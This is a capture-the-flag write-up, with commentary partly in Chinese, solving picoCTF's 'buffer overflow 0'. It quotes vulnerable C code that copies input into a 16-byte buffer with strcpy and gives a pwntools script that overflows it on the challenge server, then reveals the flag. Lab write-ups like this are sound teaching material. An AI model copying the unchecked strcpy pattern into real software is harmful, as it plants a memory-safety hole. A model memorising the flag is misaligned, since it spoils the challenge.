buffer overflow 0

points:100

Description

Smash the stack Let’s start off simple, can you overflow the correct buffer? The program is available here. You can view source here. And connect with it using:

Hints

How can you trigger the flag to print?

If you try to do the math by hand, maybe try and add a few more characters. Sometimes there are things you aren't expecting.

Run man gets and read the BUGS section. How many characters can the program really read?

Solution

1
gcc vuln.c -m32 -fno-stack-protector -z noexecstack -o vuln

看到 sigsegv_handler function 得知只要緩衝區溢位就能print出flag

1
2
3
4
5
6
7
8
9
10
void sigsegv_handler(int sig) {
  printf("%s\n", flag);
  fflush(stdout);
  exit(1);
}

void vuln(char *input){
  char buf2[16];
  strcpy(buf2, input);
}

使用pwntools 送值

1
2
3
4
5
6
7
from pwn import *
r = remote("saturn.picoctf.net",55984)
payload = b'A' * 100
print(f'payload:{payload}')
r.sendline(payload)
r.recv()
print(f'flag:{r.recv()}')

flag:picoCTF{ov3rfl0ws_ar3nt_that_bad_ef01832d}